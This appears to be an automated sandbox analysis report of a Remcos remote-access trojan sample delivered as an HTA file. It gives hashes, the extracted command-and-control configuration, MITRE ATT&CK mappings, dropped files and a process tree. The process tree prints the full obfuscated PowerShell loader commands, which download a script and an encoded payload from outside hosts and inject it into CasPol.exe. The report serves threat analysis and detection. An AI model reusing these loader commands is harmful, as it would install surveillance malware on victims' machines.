remcos | 886699a7b1f864a18f767b1f3c95d860bced175c6e9bf2a5186119b698b5de23

Analysis

max time kernel
149s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20/11/2024, 16:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seethebestthignswhichgivingbestopportunities.hta
Size

360KB
MD5

35b8d63ead2eb58b7ed815be7bcbf97f
SHA1

88ae189165c612cc11e3a83ce322363698e21daf
SHA256

886699a7b1f864a18f767b1f3c95d860bced175c6e9bf2a5186119b698b5de23
SHA512

047bfd03280a842c6527d4a0c41e2d593d3222d4617152febed39120184be179a36f99374c8bca7724b11dc78c8af202a14f63e7dfe87fefc53ffb510440fcde
SSDEEP

192:436mm7epKXV0b8ECbC/lepKXV0b8LCbC/+UepKXV0b8GepKXV0b89CbC/yepKXVl:Y65Cb

Score

10^/10

remcos remotehost defense_evasion discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Family

remcos

Botnet

RemoteHost

banaya.duckdns.org:6946

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-VCYBO3
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 3 IoCs

flow	pid	Process
14	932	PoWersHeLl.exe
22	5052	powershell.exe
25	5052	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1284	powershell.exe
5052	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
1968	powershell.exe
932	PoWersHeLl.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5052 set thread context of 2292	5052	powershell.exe	104

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWersHeLl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
932	PoWersHeLl.exe
932	PoWersHeLl.exe
1968	powershell.exe
1968	powershell.exe
1284	powershell.exe
1284	powershell.exe
5052	powershell.exe
5052	powershell.exe
5052	powershell.exe
5052	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	932	PoWersHeLl.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	1284	powershell.exe
Token: SeDebugPrivilege	5052	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2292	CasPol.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 4000 wrote to memory of 932	4000	mshta.exe	83
PID 4000 wrote to memory of 932	4000	mshta.exe	83
PID 4000 wrote to memory of 932	4000	mshta.exe	83
PID 932 wrote to memory of 1968	932	PoWersHeLl.exe	85
PID 932 wrote to memory of 1968	932	PoWersHeLl.exe	85
PID 932 wrote to memory of 1968	932	PoWersHeLl.exe	85
PID 932 wrote to memory of 2004	932	PoWersHeLl.exe	91
PID 932 wrote to memory of 2004	932	PoWersHeLl.exe	91
PID 932 wrote to memory of 2004	932	PoWersHeLl.exe	91
PID 2004 wrote to memory of 2248	2004	csc.exe	92
PID 2004 wrote to memory of 2248	2004	csc.exe	92
PID 2004 wrote to memory of 2248	2004	csc.exe	92
PID 932 wrote to memory of 4160	932	PoWersHeLl.exe	95
PID 932 wrote to memory of 4160	932	PoWersHeLl.exe	95
PID 932 wrote to memory of 4160	932	PoWersHeLl.exe	95
PID 4160 wrote to memory of 1284	4160	WScript.exe	99
PID 4160 wrote to memory of 1284	4160	WScript.exe	99
PID 4160 wrote to memory of 1284	4160	WScript.exe	99
PID 1284 wrote to memory of 5052	1284	powershell.exe	101
PID 1284 wrote to memory of 5052	1284	powershell.exe	101
PID 1284 wrote to memory of 5052	1284	powershell.exe	101
PID 5052 wrote to memory of 4596	5052	powershell.exe	103
PID 5052 wrote to memory of 4596	5052	powershell.exe	103
PID 5052 wrote to memory of 4596	5052	powershell.exe	103
PID 5052 wrote to memory of 2292	5052	powershell.exe	104
PID 5052 wrote to memory of 2292	5052	powershell.exe	104
PID 5052 wrote to memory of 2292	5052	powershell.exe	104
PID 5052 wrote to memory of 2292	5052	powershell.exe	104
PID 5052 wrote to memory of 2292	5052	powershell.exe	104
PID 5052 wrote to memory of 2292	5052	powershell.exe	104
PID 5052 wrote to memory of 2292	5052	powershell.exe	104
PID 5052 wrote to memory of 2292	5052	powershell.exe	104
PID 5052 wrote to memory of 2292	5052	powershell.exe	104
PID 5052 wrote to memory of 2292	5052	powershell.exe	104

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthignswhichgivingbestopportunities.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4000
- C:\Windows\SysWOW64\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe
  "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:932
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1968
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0uhguhzn\0uhguhzn.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2004
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB6BD.tmp" "c:\Users\Admin\AppData\Local\Temp\0uhguhzn\CSC5E93E749596E415187DFA934E8911293.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2248
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4160
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1284
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5052
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:4596
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2292

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
102B

MD5
2dec6e443633ae8ebaf1b2710f851dde

SHA1
3050949681d56540973b8b6255e3b285d66b6538

SHA256
38366e73ceb1491d0a843bcb8e044a6a096ab8d9df0387066b5e307328561aed

SHA512
3fb2073a241e391f551d2ce6bf39d4e1556faf2b1f3b44bae5a565a2493d65426a3be0f9383a93fe3e384fd6cbcb4d2e52a485d4fee8bb5ec828354b7bd465cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PoWersHeLl.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
420B

MD5
958d1b8cff363d39c40a7fbeedfd03a8

SHA1
49c85ae3c19ed232acd5242773932384f9e87326

SHA256
4dbcf48cef06c0c7fb3cee2e34a729e89323cb63e8b872e3859a78676c1f2888

SHA512
fec2961559db584083e724ae1cc68c78c5e269c850e2012d73f6aae32ee27f61a1bf48824bcb7bff7bcbdcb880cc693e2df084538538595c669d123582d9660b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
a6bbd2a312ad8354a86814fb14d9b3db

SHA1
4967db4cb442e784e67c0cec72a6c191d5a9426a

SHA256
3cf8d89a3fc618b70bb7bbb82f12f87a6427f218c60ff97f785697a355d2077b

SHA512
295253ae6828fc329d288da8aa642be52857fc420633cb00f39e88ae9c2060b4e77c9ead9676ed5c8ef08232b16cc7d9b07fef66a322f3c8249184135f33cb9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\0uhguhzn\0uhguhzn.dll

Filesize
3KB

MD5
4d5d73abbb34f4115485b88c5a29d2ff

SHA1
faa06c4b507294cee3b1502d562b9e50b159911e

SHA256
0cba0f4b94cb1fbaa3f3293a99ed43d0cc68a880ec21797d657e784a79b9d5b3

SHA512
af5c433e723ebb609bdd487d9a74cfbd2e2b530ae7639b3ba19a9aadb0b943bfbbc8bf0de1e7e40fd4a5306df794a989107930af614bf24e02da3a6a2e62f3ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB6BD.tmp

Filesize
1KB

MD5
89bea7b5bf4c45d12d93cb19c57f8add

SHA1
877b6f955ddea70d6cd3313a4ea2ba94e8717899

SHA256
86d1608ed1f37ea3227a3e4f6a59d5e178693a38db8e24f8659d8aef0104639f

SHA512
b50b6d3ddf7ec97f6a5130199c9c8c48ff916e84c4b821fa9713adec8b5e10f1d75fc3cd3f9ecbf84447a68467ad6f37741c2e2afab60662452842a93cafc422

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3bfzwakw.j0t.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS

Filesize
139KB

MD5
da5a2b2a39d7ab8b9f9adf8af69a5f61

SHA1
7588e7a25bf351ac5a16eca9b68686c7970e60e5

SHA256
99d85e0ab098efe5ff79ed0f26f5543be8d9dc316132a80ba72001cca355e89f

SHA512
d042e1ba33995ba500dd91218aaab47310b31aefa91862f744719ea659eb235080de25649e50aed2ece84c1aff78c25bee6b8dbe5c680affa925516f61f95d8a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0uhguhzn\0uhguhzn.0.cs

Filesize
487B

MD5
920ec087c1649b37d3e112b3d5ceb653

SHA1
43582d6bd4f01b5585cde7dff378fa59d38e7f7f

SHA256
d0c9b5992704caa64bb5429349502ae370a05e995cfe05650ee7ecc4142e5baa

SHA512
c79f661748e9176f0f01d405530c4704c7aab611c2d614f537ea7a7778c846a98a6156dd1f35bbe5ab5644d9c582c1de6d859925040c7a78aa44d21c19ffc673

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0uhguhzn\0uhguhzn.cmdline

Filesize
369B

MD5
59998fc5cd30df8030a6fff52397b4dd

SHA1
b1aec2fb98d0f8ab413377acdc229d0eb75f5597

SHA256
f402d1d3b811061eb2f0d356d26c89847d7e93146e1e1a042ddb34388532a95e

SHA512
1d4681d90ed1a6f047fc94ccb62ad03ecf55bffb1a0e5e3dd8e24992cef21d34bec44ec8e951c83e0293724101f52b98ba6c225cd578ba61016a3cf20101d004

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0uhguhzn\CSC5E93E749596E415187DFA934E8911293.TMP

Filesize
652B

MD5
32a14cd35f666cc960fa05f6797bd4f8

SHA1
2308fff84672d55305b1f5833479c3f55b2d4277

SHA256
3a4edfddee9090d9220ff3737bd7c6236be25c77e0684474a7065766ae5a7acc

SHA512
a5036a25d23ac09cf7adc58616a018ef98884ad39c171b69cefdecbdbf5f7df35a2d4122d046cb8a7f32e5e22bce0e7ee40f3aa224046e764a1d49f157816948

Download Submit
memory/932-4-0x0000000070B80000-0x0000000071330000-memory.dmp

Filesize
7.7MB

Download
memory/932-18-0x0000000005C10000-0x0000000005C2E000-memory.dmp

Filesize
120KB

Download
memory/932-2-0x0000000070B80000-0x0000000071330000-memory.dmp

Filesize
7.7MB

Download
memory/932-5-0x00000000053A0000-0x00000000053C2000-memory.dmp

Filesize
136KB

Download
memory/932-19-0x0000000005C50000-0x0000000005C9C000-memory.dmp

Filesize
304KB

Download
memory/932-78-0x0000000070B80000-0x0000000071330000-memory.dmp

Filesize
7.7MB

Download
memory/932-7-0x0000000005620000-0x0000000005686000-memory.dmp

Filesize
408KB

Download
memory/932-1-0x00000000022F0000-0x0000000002326000-memory.dmp

Filesize
216KB

Download
memory/932-6-0x0000000005540000-0x00000000055A6000-memory.dmp

Filesize
408KB

Download
memory/932-72-0x0000000070B80000-0x0000000071330000-memory.dmp

Filesize
7.7MB

Download
memory/932-71-0x0000000070B8E000-0x0000000070B8F000-memory.dmp

Filesize
4KB

Download
memory/932-65-0x00000000061E0000-0x00000000061E8000-memory.dmp

Filesize
32KB

Download
memory/932-0-0x0000000070B8E000-0x0000000070B8F000-memory.dmp

Filesize
4KB

Download
memory/932-3-0x0000000004D70000-0x0000000005398000-memory.dmp

Filesize
6.2MB

Download
memory/932-17-0x0000000005690000-0x00000000059E4000-memory.dmp

Filesize
3.3MB

Download
memory/1284-88-0x0000000005620000-0x0000000005974000-memory.dmp

Filesize
3.3MB

Download
memory/1968-30-0x000000006D440000-0x000000006D48C000-memory.dmp

Filesize
304KB

Download
memory/1968-50-0x0000000007C10000-0x0000000007C18000-memory.dmp

Filesize
32KB

Download
memory/1968-49-0x0000000007CE0000-0x0000000007CFA000-memory.dmp

Filesize
104KB

Download
memory/1968-48-0x0000000007BD0000-0x0000000007BE4000-memory.dmp

Filesize
80KB

Download
memory/1968-47-0x0000000007BC0000-0x0000000007BCE000-memory.dmp

Filesize
56KB

Download
memory/1968-46-0x0000000007B90000-0x0000000007BA1000-memory.dmp

Filesize
68KB

Download
memory/1968-45-0x0000000007C20000-0x0000000007CB6000-memory.dmp

Filesize
600KB

Download
memory/1968-44-0x00000000079F0000-0x00000000079FA000-memory.dmp

Filesize
40KB

Download
memory/1968-43-0x0000000007990000-0x00000000079AA000-memory.dmp

Filesize
104KB

Download
memory/1968-42-0x0000000007FE0000-0x000000000865A000-memory.dmp

Filesize
6.5MB

Download
memory/1968-41-0x0000000007850000-0x00000000078F3000-memory.dmp

Filesize
652KB

Download
memory/1968-29-0x0000000007810000-0x0000000007842000-memory.dmp

Filesize
200KB

Download
memory/1968-40-0x00000000077D0000-0x00000000077EE000-memory.dmp

Filesize
120KB

Download
memory/2292-107-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2292-115-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2292-101-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2292-103-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2292-143-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2292-110-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2292-111-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2292-112-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2292-113-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2292-104-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2292-119-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2292-118-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2292-142-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2292-126-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2292-127-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2292-134-0x0000000000400000-0x000000000047F000-memory.dmp

